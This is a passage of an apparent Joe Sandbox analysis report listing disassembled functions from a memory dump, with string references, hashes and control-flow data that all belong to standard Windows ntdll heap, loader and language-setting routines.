                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                          • API String ID: 0-3063724069
                                                          • Opcode ID: 8b51df130299121f7dc7f8925dac455c3eef6ad386b06bc9a86705a860ad8fd7
                                                          • Instruction ID: 2887cd3a64dc9b07defea50ef988f5d5723fb82b6649737508e4cc70d168f607
                                                          • Opcode Fuzzy Hash: 8b51df130299121f7dc7f8925dac455c3eef6ad386b06bc9a86705a860ad8fd7
                                                          • Instruction Fuzzy Hash: 63D1F3B2919315AFEB21CB60C840B6BB7FCAF88754F400A2DF98497251D7B4DD48CB92
                                                          Function 3591D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1494 3591d08d-3591d0b6 1495 3597a812 1494->1495 1496 3591d0bc-3591d0bf 1494->1496 1498 3597a81c-3597a825 call 35962b60 1495->1498 1496->1495 1497 3591d0c5-3591d115 call 35965130 call 35962b90 1496->1497 1506 3597a785-3597a79f call 359db256 1497->1506 1507 3591d11b-3591d12c call 3591d796 1497->1507 1505 3597a82a-3597a82c 1498->1505 1508 3597a832-3597a838 1505->1508 1509 3591d23e-3591d246 1505->1509 1517 3597a7a5-3597a7a8 1506->1517 1518 3591d1f4-3591d1f9 1506->1518 1519 3591d132-3591d135 1507->1519 1520 3597a7e0 1507->1520 1508->1509 1512 3597a83e-3597a841 1508->1512 1515 3597a843-3597a855 GetPEB call 35933ca0 1512->1515 1516 3597a860-3597a862 1512->1516 1515->1516 1516->1509 1521 3597a7ca-3597a7da call 35962b60 1517->1521 1522 3597a7aa-3597a7be call 359db1e1 1517->1522 1526 3591d204-3591d209 1518->1526 1527 3591d1fb-3591d1ff call 35962b60 1518->1527 1523 3591d249-3591d24c 1519->1523 1524 3591d13b-3591d140 1519->1524 1536 3597a7ea-3597a804 call 359db256 1520->1536 1521->1520 1522->1521 1547 3597a7c0-3597a7c5 1522->1547 1533 3591d252-3591d25c 1523->1533 1534 3591d329-3591d339 call 3591da02 1523->1534 1529 3591d1f2 1524->1529 1530 3591d146-3591d190 call 35965130 call 35962b90 1524->1530 1526->1498 1531 3591d20f-3591d214 1526->1531 1527->1526 1529->1518 1530->1536 1566 3591d196-3591d1e4 call 35965130 call 35962b90 1530->1566 1540 3591d216-3591d21a call 35962b60 1531->1540 1541 3591d21f-3591d221 1531->1541 1544 3591d262-3591d2ba call 35965130 call 35962b90 1533->1544 1545 3591d33e-3591d340 1533->1545 1534->1518 1536->1518 1560 3597a80a-3597a80c 1536->1560 1540->1541 1541->1505 1550 3591d227-3591d22a 1541->1550 1552 3591d2bf-3591d2c1 1544->1552 1545->1552 1547->1521 1556 3597a7c7-3597a7c9 1547->1556 1550->1509 1558 3591d22c-3591d238 call 3591db08 1550->1558 1552->1534 1555 3591d2c3-3591d327 call 35965130 call 35962b90 1552->1555 1555->1534 1573 3591d345 1555->1573 1556->1521 1558->1509 1570 3597a857-3597a85b 1558->1570 1560->1495 1566->1534 1576 3591d1ea-3591d1f0 1566->1576 1570->1516 1573->1506 1576->1518 1576->1529
                                                          Strings
                                                          • @, xrefs: 3591D0FD
                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3591D262
                                                          • @, xrefs: 3591D2AF
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3591D2C3
                                                          • @, xrefs: 3591D313
                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3591D146
                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3591D196
                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3591D0CF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                          • API String ID: 0-1356375266
                                                          • Opcode ID: 78f773175e306f867d6e46e85bba257139b6ad7791c02afaf664a09b147b75cd
                                                          • Instruction ID: 11ef69919fe0bcf338f73c1da92d4959b2e7fd87e1960933694cd364132eba5a
                                                          • Opcode Fuzzy Hash: 78f773175e306f867d6e46e85bba257139b6ad7791c02afaf664a09b147b75cd
                                                          • Instruction Fuzzy Hash: BDA16E719083599FE321CF20C580B9BB7E8FF84769F414D2EE99896241D775DA08CF92
                                                          Function 3591F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-523794902
                                                          • Opcode ID: 0d8c88f55e014dd51dbed6fadcbce42aeb04a7d0eb14914daaba514419b7b8f4
                                                          • Instruction ID: 84799e15176f9bf9878320b841b7d5c36b2112a8ce742786221f1b774cb8b04e
                                                          • Opcode Fuzzy Hash: 0d8c88f55e014dd51dbed6fadcbce42aeb04a7d0eb14914daaba514419b7b8f4
                                                          • Instruction Fuzzy Hash: 2E42D2752087499FD315CF38C884A2ABBE5FF88344F14496EE896CB352DB34EA45CB61
                                                          Function 3593B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          • Opcode ID: e6e1788be513af10adc7c6833791c92d772cc8b77e60b7e27c79e506c7a535b2
                                                          • Instruction ID: d96de9a8d32c20a852ffa1abb94c87f52a5dc82b41c5d9053facbf9a861c4eda
                                                          • Opcode Fuzzy Hash: e6e1788be513af10adc7c6833791c92d772cc8b77e60b7e27c79e506c7a535b2
                                                          • Instruction Fuzzy Hash: FBC12575B06315EBEB14CB64C882BBEB7BAFF45300F5441A9E805AB281DF749D44C3A1
                                                          Function 3594F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 359902BD
                                                          • RTL: Re-Waiting, xrefs: 3599031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 359902E7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: b8fc64a8037e120834c3f6d1b461d1871abe33cf9b02fac8cc5f7bf60617cd9f
                                                          • Instruction ID: 22e676d69c9867ccd7afae0852240a485372c3c5b1cb506ad97bd4a1598bf4c2
                                                          • Opcode Fuzzy Hash: b8fc64a8037e120834c3f6d1b461d1871abe33cf9b02fac8cc5f7bf60617cd9f
                                                          • Instruction Fuzzy Hash: 82E1CEB46087429FE724CF28C880B6AB7E5FF88324F150A59E5A5CB3D1DB74E945CB42
                                                          Function 359451EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • WindowsExcludedProcs, xrefs: 3594522A
                                                          • Kernel-MUI-Language-Allowed, xrefs: 3594527B
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 35945352
                                                          • Kernel-MUI-Language-SKU, xrefs: 3594542B
                                                          • Kernel-MUI-Number-Allowed, xrefs: 35945247
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: 93b6e4c89e3e50b5627a778970f46a09a45ed9acb50d5123787c029bf54b18f4
                                                          • Instruction ID: ada961895fc4f0c943edcdacb540c461cfd7a9fde692cb699b4da26956d75629
                                                          • Opcode Fuzzy Hash: 93b6e4c89e3e50b5627a778970f46a09a45ed9acb50d5123787c029bf54b18f4
                                                          • Instruction Fuzzy Hash: 90F14CB6E15218EBDB11CF98C980E9EBBFDFF08650F55406AE401A7211EB74AE05CB90
                                                          Function 359FB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1a69ffc12e6522ee1932a1e6d53df53575ed74677711de35c45afb9fcdd696f9
                                                          • Instruction ID: e75643fdc9aa5483563d08f7d7407732681160fe2bcdcd47d147025718988992
                                                          • Opcode Fuzzy Hash: 1a69ffc12e6522ee1932a1e6d53df53575ed74677711de35c45afb9fcdd696f9
                                                          • Instruction Fuzzy Hash: 01F10376F002158FDB08CF68C9A06BEBBF6FF98211B19416DD456EB381E675EA01CB50
                                                          Function 359176B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                          • API String ID: 0-3061284088
                                                          • Opcode ID: 29f59bdcf1fff031737098b70d40b9026ba3bdbbd053d0106076c7632ab7e52f
                                                          • Instruction ID: 6cabaeeee80461137cb325c5f1129c82ea14544c4943469ea3901f93ad310641
                                                          • Opcode Fuzzy Hash: 29f59bdcf1fff031737098b70d40b9026ba3bdbbd053d0106076c7632ab7e52f
                                                          • Instruction Fuzzy Hash: 0601703B115354DEE315831CF408F967BEAEF4A770F29404AE40147752DFA5AD81C960
                                                          Function 359370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: b0673197e3cddc46baf774915d41bd7043dda4cc457391c7b7e97e05c1218b2a
                                                          • Instruction ID: 7aeaac4aaad044de148d09a7f4ed417387fa0c94ac76778610475d8a2358c5d0
                                                          • Opcode Fuzzy Hash: b0673197e3cddc46baf774915d41bd7043dda4cc457391c7b7e97e05c1218b2a
                                                          • Instruction Fuzzy Hash: C413C174A06315CFEB15CF68C891BA9BBF6FF48304F1481A9D849AB381D774A946CF90
                                                          Function 3591F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                          • API String ID: 0-2586055223
                                                          • Opcode ID: 5c3b3f2e045d1d3f46a96f9bb7d9cd4780d827b39ab7db5a73af2a773e9e9367
                                                          • Instruction ID: faf1e36c00c2076ef0eb0f31e20488d5d75868e2ce6e319961b1b65b055b77c8
                                                          • Opcode Fuzzy Hash: 5c3b3f2e045d1d3f46a96f9bb7d9cd4780d827b39ab7db5a73af2a773e9e9367
                                                          • Instruction Fuzzy Hash: 2F613076308788AFE312CB28D844F17B7E9FF84754F080469E9518B292CB34E901CB61
                                                          Function 359D11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                          • API String ID: 0-336120773
                                                          • Opcode ID: 62d7f8546a6e6550a6cc07819849ff4e6215095c690cf7f4d0d651af582e4c95
                                                          • Instruction ID: 7d9175382564fa993d8dd138a219991fe26b6a0a2a3e5eb76ad603f7056d0f40
                                                          • Opcode Fuzzy Hash: 62d7f8546a6e6550a6cc07819849ff4e6215095c690cf7f4d0d651af582e4c95
                                                          • Instruction Fuzzy Hash: E2312637204294EFD710CB98D880F5AB3FAFF08668F118155FA02DB291DB32ED41DA64
                                                          Function 35919148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                          • API String ID: 0-1391187441
                                                          • Opcode ID: 543a25370583589446bbb4b8e30637b3e2010539dc9456485b8204cd4fe6aeef
                                                          • Instruction ID: f317d8128c5f78a175ad759ac6a9e7b50d70a269328fded6726639eb5b45aab8
                                                          • Opcode Fuzzy Hash: 543a25370583589446bbb4b8e30637b3e2010539dc9456485b8204cd4fe6aeef
                                                          • Instruction Fuzzy Hash: E731A136600618EFD701DB55C888F9AB7FEFF49764F114192E815AB291E770EE80CE60
                                                          Function 35927152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 3d6166987d265dfefe5eddf2f7bea5ab7daaa122d64cd5758362618d42b31e6a
                                                          • Instruction ID: f3e29de5a6bbc8cf3d16ca73a2bffe766994be55fed7d4912ed7976177acb612
                                                          • Opcode Fuzzy Hash: 3d6166987d265dfefe5eddf2f7bea5ab7daaa122d64cd5758362618d42b31e6a
                                                          • Instruction Fuzzy Hash: C2511035A04B0AEFEB05CF65CE44BADBBB9FF04355F144069E412A3291EBB4A911DB81
                                                          Function 35921460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35921728
                                                          • HEAP[%wZ]: , xrefs: 35921712
                                                          • HEAP: , xrefs: 35921596
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 495a006e2038b66d0aae629d1512da7f02485572facd3e814887158a676da4f4
                                                          • Instruction ID: cd6f7654056a466eac4a9a3bfa91ab51ce5c791415088beea5c404403b5a9f27
                                                          • Opcode Fuzzy Hash: 495a006e2038b66d0aae629d1512da7f02485572facd3e814887158a676da4f4
                                                          • Instruction Fuzzy Hash: 72E1F274A043899FE715CF28C450B7ABBFAFF48304F18849EE4969B24ADB34E951DB50
                                                          Function 3592B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                          • API String ID: 0-1145731471
                                                          • Opcode ID: b87dbdc9af4ef54f2593fe2035fc5834c63d8481fdae929c8eb6226237ef041f
                                                          • Instruction ID: c8b115294f9b8315c2e4533caa4bb291d3390e12be3280b7f50bbb2061a0c59a
                                                          • Opcode Fuzzy Hash: b87dbdc9af4ef54f2593fe2035fc5834c63d8481fdae929c8eb6226237ef041f
                                                          • Instruction Fuzzy Hash: BFB1CC79A187098FDB25CF68C980F9DB3FABF48354F144929E855EB684D738E840CB51
                                                          Function 359A368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                          • API String ID: 0-2391371766
                                                          • Opcode ID: d590bc075687f0b2b9f192945b8dcc30f59efb8edc7b77aedec5674518741f74
                                                          • Instruction ID: 9922695dad9bea063556cecaa9bc4c3b0f2d3be8133900533c228114207307f6
                                                          • Opcode Fuzzy Hash: d590bc075687f0b2b9f192945b8dcc30f59efb8edc7b77aedec5674518741f74
                                                          • Instruction Fuzzy Hash: 5AB19BB6608345AFE712CE54C880F5BB7E8FB49754F410829FA41AB650DB74E909CBA2
                                                          Function 359B36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                          • API String ID: 0-318774311
                                                          • Opcode ID: a85db80ea518c9037343e50496b9d4bb04841ccdfc5ee3c5ddffdfe7924f7590
                                                          • Instruction ID: 2cbb1f31c5d45379c97a8009dc150f6e7d3c3f8925923d590b7b280fe7ce98e0
                                                          • Opcode Fuzzy Hash: a85db80ea518c9037343e50496b9d4bb04841ccdfc5ee3c5ddffdfe7924f7590
                                                          • Instruction Fuzzy Hash: 79816DB5608341AFEB11CB15C881B6AB7E8FF89750F44092DF9919B391DBF8E904CB52
                                                          Function 359A7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                          • API String ID: 0-3870751728
                                                          • Opcode ID: c69f18ca6a47fdd0418ecd62ab1a01b38385b4138eb2fb957454323c10432b36
                                                          • Instruction ID: 92a7a02eba07edcb775daeef892842ea3c049b76e3f1131661c5711b5b98e1a3
                                                          • Opcode Fuzzy Hash: c69f18ca6a47fdd0418ecd62ab1a01b38385b4138eb2fb957454323c10432b36
                                                          • Instruction Fuzzy Hash: D0914CB5E002059FEB14CF68C881B9DBBF1FF88314F14816AD905AB391EB759842CFA5
                                                          Function 3592B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                          • API String ID: 0-373624363
